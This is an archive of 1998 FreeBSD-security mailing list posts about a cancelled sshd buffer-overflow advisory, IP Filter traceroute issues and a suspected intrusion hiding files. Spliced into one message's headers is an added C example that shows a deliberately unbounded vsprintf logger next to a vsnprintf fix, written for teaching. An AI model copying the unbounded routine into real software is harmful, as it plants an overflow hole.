>[snip]
>
>Question:
>
>How did a discussion that was meant to logically determine the
>(un)importance of potential ssh vulnerabilities degrade into a
>childish "Linux is for lusers" (I guess I should respect the opinion
>of one who can't spell) argument which is currently doing little more
>than stating what we all (at least should) already know?

Anyone using ssh should know potential problems with various
configurations.

>While this thread grows, consumes more and more bandwidth, and gets
>more off-topic, who's actually working on this problem and attempting
>to resolve it? JKH's posts are the only ones I've seen that are
>level headed - let's not go off on tangents and make speculations that
>in no way help our cause. There's work to be done.

Agreed, and any discussion about various ssh auth methods should be
complete, otherwise there could be a discussion lasting forever on an
if-then basis.

>My (and hopefully the list's) respect to the individual(s) who
>actually comes up with proof-of-concept exploit code (to either prove
>or disprove ssh claims).

Any exploit would also depend on how ssh is configured. After reading the
forwarded bulletin and checking out the links, as well as reading all the
speculation here along with "possible problems" with the code, there was
not one mention of HOW rootshell was implementing ssh. If they allow
password authentication through ssh, how could this be considered an
exploit without knowing the ENTIRE configuration?! Surely if the
configuration was poorly thought out, anyone with the password could gain
access.

>Sorry if this is a little terse - but I don't see how having a
>mailbox full of "Did you hear this? and this... and this..." type
>messages is going to help our situation. Let's fix it or shut up.

I'd say more facts are needed:

Rhosts/RhostsRSA?
"PasswordAuthentication yes" or not?
"PermitRootLogin" yes or not?
If only RSA key, were there only certain hosts that could use the key?
Or were they using wrapper to limit where connections could come from?
Or were there firewall rules to limit connections to ssh?
Or what combinations of any?
etc, etc, etc

There are just too many possibilities and since rootshell has NOT released
any of this, we can only speculate.

Sure there are many ways "to shoot oneself in the foot," but there are
services that some use that need a bit of work in other areas to protect
them. NFS would be a good one, since it was mentioned in this thread.
Using NIS would be another one, but many services depend on "sane"
implementations.

Also you can't fix something if you don't know how to break it, or in this
case, how it was broken. Even so, I can appreciate someone doing an audit
of sshd's code and pointing out *potential* problems and possibly
providing a "fix" to the FBSD port version.

No one mentions IBM's suggestions and if they should be used. Would using
some of the code from ssh2 be an improvement, since ssh2 was an almost
complete rewrite?

Vaguely amused by the article at ssh.fi and moderately concerned that a
system, paraphrasing them, "using only ssh for connection" was
compromised. Continued discussion should be about how one should configure
sshd properly, especially if it will be the only access method allowed.

I'm concerned, but don't care to run around and cry "the sky is falling"
without knowing WHY it is falling, if indeed it is.
regards

Jeff Mountin - Unix Systems TCP/IP networking
jeff@mountin.net

From owner-freebsd-security Mon Nov 2 13:23:04 1998
Date: Mon, 2 Nov 1998 13:21:49 -0800 (PST)
From: Christopher Nielsen
Reply-To: enkhyl@hayseed.net
To: Peter Jeremy
cc: freebsd-security@FreeBSD.ORG, winter@jurai.net
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
In-Reply-To: <98Nov2.132551est.40330@border.alcanet.com.au>

On Mon, 2 Nov 1998, Peter Jeremy wrote:
> Date: Mon, 2 Nov 1998 13:26:18 +1100
> From: Peter Jeremy
> To: freebsd-security@FreeBSD.ORG, winter@jurai.net
> Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
>
> "Matthew N. Dodd" wrote:
> > At this point there isn't any reason not to go about fixing these
> > potential problems though.
>
> ssh also contains a large number of sprintf() calls. Not all of these
> are immediately innocuous. There are also 2 sscanf() calls with %s
> formats which could be dangerous. Not to mention the str[n]cat() and
> str[n]cpy() calls. Unfortunately I have another bushfire to worry
> about right now, or I'd check through them as well.
>
> The problem with C is that there are too many ways to shoot yourself
> in the foot... A full security audit on ssh (which it sounds like it
> might need) would be fairly time-consuming.

It might be time better spent rewriting SSH. SSH 1.2.x is suffering from
serious bloat, IMHO. Yes, I know about version 2.x; I'm just not
particularly happy with the license.

-- 
Christopher Nielsen
Scient: The Art and Science of Electronic Business
cnielsen@scient.com

From owner-freebsd-security Mon Nov 2 14:22:07 1998
From: bow Message-Id: <199811022220.OAA09923@bow.net> Subject: Important information about IBM-ERS' "ssh" advisory (fwd) To: freebsd-security@FreeBSD.ORG Date: Mon, 2 Nov 1998 14:20:50 -0800 (PST) X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ----- Forwarded message from David A. Curry ----- >From errors-nohumans@merit.edu Mon Nov 2 12:08:55 1998 Message-Id: <199811020916.EAA05454@intrepid.somers.hqregion.ibm.com> To: nanog@merit.edu Subject: Important information about IBM-ERS' "ssh" advisory Content-ID: <5447.909998182.1@intrepid.somers.hqregion.ibm.com> Date: Mon, 02 Nov 1998 04:16:22 EST 
From: "David A. Curry" Sender: owner-nanog@merit.edu On Friday, Oct. 30th, IBM-ERS sent out a draft advisory to be released on Monday, Nov. 2nd that described a buffer overflow condition in Version 1.2.x "sshd." This draft was sent to the Forum of Incident Response and Security Teams, and also to the "ssh-bugs" list for their comment/review. The draft was identified as ERS-SVA-E01-1998:005.1. Rootshell has unfortunately chosen to include a copy of this draft advisory in their recent newsletter, apparently for the purposes of defending itself against charges that it was unfairly disparaging "sshd." Use of IBM-ERS's draft advisory in this manner was not approved or authorized by IBM-ERS, and does a disservice to all. Here are the facts about this advisory: 1. IBM-ERS advisory ERS-SVA-E01-1998:005.1 was never issued publicly by IBM. 2. In response to a telephone query from Kit Knox of Rootshell, IBM-ERS attempted to contact Kit on Friday evening, and was unable to reach him. Specific contact information for IBM-ERS, as well as a brief status update, were left on Mr. Knox's voice mail. Mr. Knox never contacted IBM-ERS after that time. 3. IBM has been working closely with Tatu Ylonen, author of "ssh," to make sure that the potential vulnerability described in the advisory is not exploitable. Upon further investigation, the problem originally described appears to have been influenced by outside factors and does not appear to be an exploitable problem in "sshd." 4. IBM-ERS advisory ERS-SVA-E01-1998:005.1 was CANCELLED on the morning of Sunday, Nov. 1st, *before* Mr. Knox issued his newsletter. 5. At this time, IBM-ERS has NO KNOWLEDGE of any security vulnerabilities, exploitable or otherwise, in the "sshd" program. We hope that this clarifies IBM's involvement in this situation. --------------------------------------------------------------------------- The information in this document is provided as a service to customers of the IBM Emergency Response Service. 
Neither International Business Machines Corporation, nor any of its employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process contained herein, or represents that its use would not infringe any privately owned rights. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by IBM or its subsidiaries. The views and opinions of authors expressed herein do not necessarily state or reflect those of IBM or its subsidiaries, and may not be used for advertising or product endorsement purposes. ----- End of forwarded message from David A. Curry ----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 14:38:10 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA19186 for freebsd-security-outgoing; Mon, 2 Nov 1998 14:38:10 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id OAA19178 for ; Mon, 2 Nov 1998 14:38:07 -0800 (PST) (envelope-from imp@village.org) Received: from harmony [10.0.0.6] by rover.village.org with esmtp (Exim 1.71 #1) id 0zaSbg-0002YZ-00; Mon, 2 Nov 1998 15:37:52 -0700 Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.1/8.8.3) with ESMTP id PAA16222; Mon, 2 Nov 1998 15:37:33 -0700 (MST) Message-Id: <199811022237.PAA16222@harmony.village.org> To: bow Subject: Re: [rootshell] Security Bulletin #25 (fwd) Cc: FreeBSD-security@FreeBSD.ORG In-reply-to: Your message of "Sun, 01 Nov 1998 14:54:57 PST."
<199811012254.OAA29528@bow.net> References: <199811012254.OAA29528@bow.net> Date: Mon, 02 Nov 1998 15:37:33 -0700 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Just so everyone knows, this advisory was only a draft advisory and was cancelled over the weekend. I saw the original advisory and checked stuff in based on it, since generally changes like this are good and can't hurt anything. After I checked in the fixes to ssh, I discovered that it had been determined that there was no way of exploiting this buffer call because all the places that called it had bounds checking. Given that the changes I made don't hurt anything, I'm going to leave them in for now. Warner -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBNj40Kdxynu/2qPVhAQFHRQP9FE//4+CBcUQcZAyKZCMsPNPXu2aiihlx NnoD3vkxtCtkopxaTIVeadtcqMdKpVuhLSK2ChrCnZNtpHu4lE/ZImiUQj5WXyyr klHlR+rY8tNHQFf9xtlVNcqULYx/wkJCLJSCknlzUA+/xblhUlR2n64ctvodRI40 ESNEjlOFBwA= =aOA4 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 15:00:41 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA21953 for freebsd-security-outgoing; Mon, 2 Nov 1998 15:00:41 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cyclops.xtra.co.nz (cyclops.xtra.co.nz [202.27.184.96]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA21946 for ; Mon, 2 Nov 1998 15:00:38 -0800 (PST) (envelope-from junkmale@pop3.xtra.co.nz) Received: from wocker (210-55-210-87.ipnets.xtra.co.nz [210.55.210.87]) by cyclops.xtra.co.nz (8.9.1/8.9.1) with SMTP id MAA19467; Tue, 3 Nov 1998 12:00:24 +1300 (NZDT) Message-Id: <199811022300.MAA19467@cyclops.xtra.co.nz> 
From: "Dan Langille" Organization: DVL Software Limited To: Darren Reed Date: Tue, 3 Nov 1998 12:00:24 +1300 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: IPFW problems... Reply-to: junkmale@xtra.co.nz CC: freebsd-security@FreeBSD.ORG In-reply-to: <199811011102.AAA03077@predator.xtra.co.nz> References: <199810291803.HAA15509@witch.xtra.co.nz> from "Dan Langille" at Oct 30, 98 07:03:17 am X-mailer: Pegasus Mail for Win32 (v3.01b) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 1 Nov 98, at 22:02, Darren Reed wrote: > In some mail from Dan Langille, sie said: > > > > On 29 Oct 98, at 21:45, Darren Reed wrote: > > > > > traceroute/UDP was fixed on the weekend last, the pc (ICMP) version > > > may not yet work. > > > > OK. Good! Can you guess when the other version will work? > > My testing shows "traceroute -I" to work properly with NAT. I'm not sure what "traceroute -I" does. I see no such option on traceroute for FreeBSD 2.2.7. As for my traceroute problems, my mind is unclear. I admit that I didn't take full notes. As such, I supply the following in the hopes that it may trigger something when you read it. If it does not, then I will reinstall IP Filter and get the full story. I'm using IP Filter 3.2.9 under FreeBSD 2.2.7 RELEASE. I believe I was able to traceroute when using NAT and without any deny rules. When I tried to add in the example firewall rules (from rules/BASIC_2.FW), I found that disabling the following rule allowed traceroute to work: block in log quick all with short When this rule was present, traceroute did not work at all. 
-- Dan Langille The FreeBSD Diary http://www.FreeBSDDiary.com/freebsd To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 15:49:45 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA27830 for freebsd-security-outgoing; Mon, 2 Nov 1998 15:49:45 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (aniwa.actrix.gen.nz [203.96.56.186]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA27817 for ; Mon, 2 Nov 1998 15:49:36 -0800 (PST) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.8/8.8.7) with SMTP id MAA09378; Tue, 3 Nov 1998 12:47:41 +1300 (NZDT) (envelope-from andrew@squiz.co.nz) Date: Tue, 3 Nov 1998 12:47:41 +1300 (NZDT) 
From: Andrew McNaughton X-Sender: andrew@aniwa.sky Reply-To: andrew@squiz.co.nz To: Warner Losh cc: bow , FreeBSD-security@FreeBSD.ORG Subject: Re: [rootshell] Security Bulletin #25 (fwd) In-Reply-To: <199811022237.PAA16222@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 2 Nov 1998, Warner Losh wrote: > Just so everyone knows, this advisory was only a draft advisory and > was cancelled over the weekend. I saw the original advisory and > checked stuff in based on it, since generally changes like this are > good and can't hurt anything. After I checked in the fixes to ssh, I > discovered that it had been determined that there was no way of > exploiting this buffer call because all the places that called it had > bounds checking. I had a brief look over the ssh code some months ago. I didn't find anything exploitable, but I did find things that made me uncomfortable, like the logging routine that uses vsprintf (or something similarly lacking in bounds checking) and expected all the places it was checked to do the bounds checking. As far as I looked, they pretty much did, though in one place I noted that it was dependent on the length of a domain name returned from a reverse lookup. 
Andrew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 17:02:06 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA10206 for freebsd-security-outgoing; Mon, 2 Nov 1998 17:02:06 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA10201 for ; Mon, 2 Nov 1998 17:02:04 -0800 (PST) (envelope-from brett@lariat.org) Received: (from brett@localhost) by lariat.lariat.org (8.8.8/8.8.6) id SAA00776; Mon, 2 Nov 1998 18:01:30 -0700 (MST) Message-Id: <4.1.19981102180015.046c7490@127.0.0.1> X-Sender: brett@127.0.0.1 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Mon, 02 Nov 1998 18:01:23 -0700 To: andrew@squiz.co.nz, Warner Losh 
From: Brett Glass Subject: Re: [rootshell] Security Bulletin #25 (fwd) Cc: bow , FreeBSD-security@FreeBSD.ORG In-Reply-To: References: <199811022237.PAA16222@harmony.village.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 12:47 PM 11/3/98 +1300, Andrew McNaughton wrote: >I had a brief look over the ssh code some months ago. I didn't find >anything exploitable, but I did find things that made me uncomfortable, >like the logging routine that uses vsprintf (or something similarly >lacking in bounds checking) and expected all the places it was checked to >do the bounds checking. Watch out for logging routines. When some folks got into our system via the Qpopper exploit, the long messages sent by QPopper crashed syslogd. This might be an avenue for a hack. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 20:11:41 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA04498 for freebsd-security-outgoing; Mon, 2 Nov 1998 20:11:41 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from emu.sourcee.com (emu.sourcee.com [199.201.159.173]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA04488 for ; Mon, 2 Nov 1998 20:11:38 -0800 (PST) (envelope-from nrice@emu.sourcee.com) Received: (from nrice@localhost) by emu.sourcee.com (8.9.1/8.9.1) id XAA03032; Mon, 2 Nov 1998 23:11:00 -0500 (EST) Message-ID: <19981102231100.C2779@emu.sourcee.com> Date: Mon, 2 Nov 1998 23:11:00 -0500 
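[Editor's added example, placed between the messages of the thread. It is not ssh's source and not code posted by any participant; it illustrates the logging pattern Peter Jeremy, Warner Losh and Andrew McNaughton are discussing: a routine that formats into a fixed buffer with vsprintf() and relies on every caller to bound the arguments, beside the vsnprintf() form that cannot overrun. The function names, the 256-byte buffer and the "Connection from %s" format are assumptions made for the example; the host name is built in the code as a stand-in for whatever a reverse lookup returns, which is the input Andrew points out the caller does not control. Nothing here is a claim about ssh itself; the thread records that IBM found the reported case not exploitable.]

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define LOGBUF 256   /* fixed line buffer of the hypothetical logger (an assumption) */

/* The pattern the thread is uneasy about: a fixed buffer, vsprintf() with no
 * length, and a promise that every caller keeps the arguments short.  Below it
 * is only ever called on input already measured to fit, since overrunning the
 * buffer is undefined behaviour, not something to demonstrate by doing it. */
static void log_unchecked(char *buf, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsprintf(buf, fmt, ap);   /* runs past buf once the text reaches LOGBUF bytes */
    va_end(ap);
}

/* How long would the line be?  vsnprintf(NULL, 0, ...) measures without writing. */
static int formatted_length(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int need = vsnprintf(NULL, 0, fmt, ap);
    va_end(ap);
    return need;
}

/* Hardened form: vsnprintf() never writes past LOGBUF and always NUL-terminates.
 * Returns 0 if the line fit, 1 if it was truncated, -1 on a format error. */
static int log_checked(char *buf, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int need = vsnprintf(buf, LOGBUF, fmt, ap);
    va_end(ap);
    if (need < 0) { buf[0] = '\0'; return -1; }
    return need >= LOGBUF;    /* need + 1 bytes (with the NUL) had to fit */
}

/* Log "Connection from <host>" for a host name of hostlen characters.  The name
 * is built here as a stand-in for whatever a reverse lookup handed back; its
 * length is the one input the logger's caller does not control.  Returns 0 if
 * the unchecked logger would have been fine, 1 if it would have overflowed
 * LOGBUF (the checked logger truncated instead), -1 on error. */
static int connection_log_check(size_t hostlen)
{
    char host[1024], line[LOGBUF], line2[LOGBUF];
    if (hostlen >= sizeof host) return -1;
    memset(host, 'a', hostlen);
    host[hostlen] = '\0';

    int need = formatted_length("Connection from %s", host);
    int overflow = need < 0 || need >= LOGBUF;
    int truncated = log_checked(line, "Connection from %s", host);
    if (truncated < 0 || truncated != overflow) return -1;
    if (strlen(line) >= LOGBUF) return -1;   /* cannot happen: vsnprintf terminated it */

    if (!overflow) {                          /* bounded by the caller, so vsprintf is safe here */
        log_unchecked(line2, "Connection from %s", host);
        if (strcmp(line, line2) != 0) return -1;
    }
    return overflow;
}

int main(void)
{
    printf("host of 63 chars:  %d (fits)\n", connection_log_check(63));
    printf("host of 255 chars: %d (vsprintf would overflow; vsnprintf truncated)\n",
           connection_log_check(255));
    return 0;
}
```

The unchecked routine is exercised only on input already measured to fit, so the program never actually overruns the buffer; the point is that its safety is a property of every caller, while the checked routine's safety is a property of the routine itself, and it reports truncation so a caller can tell that a line was cut short. A 63-character name fits with 16 bytes of prefix; a 240-character name is the first one that needs 256 bytes plus the terminator, which is where vsprintf() would have written past the end.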
From: "Norman C. Rice" To: junkmale@xtra.co.nz, Darren Reed Cc: freebsd-security@FreeBSD.ORG Subject: Re: IPFW problems... References: <199810291803.HAA15509@witch.xtra.co.nz> <199811011102.AAA03077@predator.xtra.co.nz> <199811022300.MAA19467@cyclops.xtra.co.nz> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.91.1i In-Reply-To: <199811022300.MAA19467@cyclops.xtra.co.nz>; from Dan Langille on Tue, Nov 03, 1998 at 12:00:24PM +1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Nov 03, 1998 at 12:00:24PM +1300, Dan Langille wrote: > On 1 Nov 98, at 22:02, Darren Reed wrote: > > > In some mail from Dan Langille, sie said: > > > > > > On 29 Oct 98, at 21:45, Darren Reed wrote: > > > > > > > traceroute/UDP was fixed on the weekend last, the pc (ICMP) version > > > > may not yet work. > > > > > > OK. Good! Can you guess when the other version will work? > > > > My testing shows "traceroute -I" to work properly with NAT. > > I'm not sure what "traceroute -I" does. I see no such option on > traceroute for FreeBSD 2.2.7. Perhaps he is using the Linux version of traceroute where the `-I' option uses ICMP ECHO instead of UDP datagrams. -- Regards, Norman C. Rice, Jr. > > As for my traceroute problems, my mind is unclear. I admit that I didn't > take full notes. As such, I supply the following in the hopes that it may > trigger something when you read it. If it does not, then I will reinstall > IP Filter and get the full story. > > I'm using IP Filter 3.2.9 under FreeBSD 2.2.7 RELEASE. > > I believe I was able to traceroute when using NAT and without any deny > rules. When I tried to add in the example firewall rules (from > rules/BASIC_2.FW), I found that disabling the following rule allowed > traceroute to work: > > block in log quick all with short > > When this rule was present, traceroute did not work at all. 
> > -- > Dan Langille > The FreeBSD Diary > http://www.FreeBSDDiary.com/freebsd To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 20:44:34 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA09027 for freebsd-security-outgoing; Mon, 2 Nov 1998 20:44:34 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.224.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA09017 for ; Mon, 2 Nov 1998 20:44:32 -0800 (PST) (envelope-from avalon@coombs.anu.edu.au) Message-Id: <199811030444.UAA09017@hub.freebsd.org> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA237158227; Tue, 3 Nov 1998 15:43:47 +1100 
From: Darren Reed Subject: Re: IPFW problems... To: nrice@emu.sourcee.com (Norman C. Rice) Date: Tue, 3 Nov 1998 15:43:47 +1100 (EDT) Cc: junkmale@xtra.co.nz, avalon@coombs.anu.edu.au, freebsd-security@FreeBSD.ORG In-Reply-To: <19981102231100.C2779@emu.sourcee.com> from "Norman C. Rice" at Nov 2, 98 11:11:00 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Norman C. Rice, sie said: > > On Tue, Nov 03, 1998 at 12:00:24PM +1300, Dan Langille wrote: > > On 1 Nov 98, at 22:02, Darren Reed wrote: > > > > > In some mail from Dan Langille, sie said: > > > > > > > > On 29 Oct 98, at 21:45, Darren Reed wrote: > > > > > > > > > traceroute/UDP was fixed on the weekend last, the pc (ICMP) version > > > > > may not yet work. > > > > > > > > OK. Good! Can you guess when the other version will work? > > > > > > My testing shows "traceroute -I" to work properly with NAT. > > > > I'm not sure what "traceroute -I" does. I see no such option on > > traceroute for FreeBSD 2.2.7. > > Perhaps he is using the Linux version of traceroute where the > `-I' option uses ICMP ECHO instead of UDP datagrams. Not the "Linux" version, at least traceroute 1.4a5 (from LBL) supports it. 
Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 20:57:06 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA10650 for freebsd-security-outgoing; Mon, 2 Nov 1998 20:57:06 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from tok.qiv.com (tok.qiv.com [205.238.142.68]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA10645 for ; Mon, 2 Nov 1998 20:57:05 -0800 (PST) (envelope-from jdn@acp.qiv.com) Received: (from uucp@localhost) by tok.qiv.com (8.8.8/8.8.5) with UUCP id WAA07863 for security@freebsd.org; Mon, 2 Nov 1998 22:56:58 -0600 (CST) Received: from localhost (jdn@localhost) by acp.qiv.com (8.8.8/8.8.8) with SMTP id WAA02152 for ; Mon, 2 Nov 1998 22:56:25 -0600 (CST) (envelope-from jdn@acp.qiv.com) Date: Mon, 2 Nov 1998 22:56:24 -0600 (CST) 
From: Jay Nelson To: security@FreeBSD.ORG Subject: hidden files question Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org We have an office server running 2.2.7-RELEASE doing DNS, Samba and mail. We have had several intrusion attempts over the past few weeks that have failed. Today, /var was showing 50 MB and I could only account for about 5MB. I could find no hidden files. Any combination I've used with find hasn't shown anything. Any ideas on how I can find the missing 45MB? Is there a known benign condition that could account for this? Thanks -- Jay To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 21:33:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA14944 for freebsd-security-outgoing; Mon, 2 Nov 1998 21:33:23 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA14936 for ; Mon, 2 Nov 1998 21:33:20 -0800 (PST) (envelope-from brett@lariat.org) Received: (from brett@localhost) by lariat.lariat.org (8.8.8/8.8.6) id WAA02966; Mon, 2 Nov 1998 22:33:11 -0700 (MST) Message-Id: <4.1.19981102223232.0470a100@127.0.0.1> X-Sender: brett@127.0.0.1 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Mon, 02 Nov 1998 22:33:07 -0700 To: Jay Nelson , security@FreeBSD.ORG
From: Brett Glass Subject: Re: hidden files question In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Look in logs that have turned over. You may see lots of messages related to intrusion attempts. We did. --Brett At 10:56 PM 11/2/98 -0600, Jay Nelson wrote: >We have an office server running 2.2.7-RELEASE doing DNS, Samba and >mail. We have had several intrusion attempts over the past few weeks >that have failed. Today, /var was showing 50 MB and I could only >account for about 5MB. I could find no hidden files. > >Any combination I've used with find hasn't shown anything. Any ideas >on how I can find the missing 45MB? > >Is there a known benign condition that could account for this? > >Thanks > >-- Jay > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 21:55:31 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA17381 for freebsd-security-outgoing; Mon, 2 Nov 1998 21:55:31 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from noether.uoregon.edu (noether.uoregon.edu [128.223.36.95]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA17376 for ; Mon, 2 Nov 1998 21:55:29 -0800 (PST) (envelope-from jl@noether.uoregon.edu) Received: from localhost (jl@localhost) by noether.uoregon.edu (8.8.7/8.8.7) with SMTP id VAA01049; Mon, 2 Nov 1998 21:55:17 -0800 Date: Mon, 2 Nov 1998 21:55:17 -0800 (PST)
From: Joshua Lackey Reply-To: Joshua Lackey To: Jay Nelson cc: security@FreeBSD.ORG Subject: Re: hidden files question In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Possibly you had ``ls'' replaced with a version that hides files. You may try ``find /var -name "*" -print'' as I've found that script-jockeys will replace ``ls'' but forget other similar programs. Best thing to do is to get a known good copy of ``ls'' and look at the directory. You may also want to reboot and then go into single-user mode to make sure no lkm's are hiding things from you. Samba has had some problems in the past (if I remember correctly.) It's painful, but you're going to have to reinstall. Look into tripwire so you don't have to do it again. Josh. On Mon, 2 Nov 1998, Jay Nelson wrote: > We have an office server running 2.2.7-RELEASE doing DNS, Samba and > mail. We have had several intrusion attempts over the past few weeks > that have failed. Today, /var was showing 50 MB and I could only > account for about 5MB. I could find no hidden files. > > Any combination I've used with find hasn't shown anything. Any ideas > on how I can find the missing 45MB? > > Is there a known benign condition that could account for this?
> > Thanks > > -- Jay > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- jl@noether.uoregon.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 22:03:55 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA18773 for freebsd-security-outgoing; Mon, 2 Nov 1998 22:03:55 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.224.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA18736 for ; Mon, 2 Nov 1998 22:03:51 -0800 (PST) (envelope-from avalon@coombs.anu.edu.au) Message-Id: <199811030603.WAA18736@hub.freebsd.org> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA250533011; Tue, 3 Nov 1998 17:03:31 +1100 
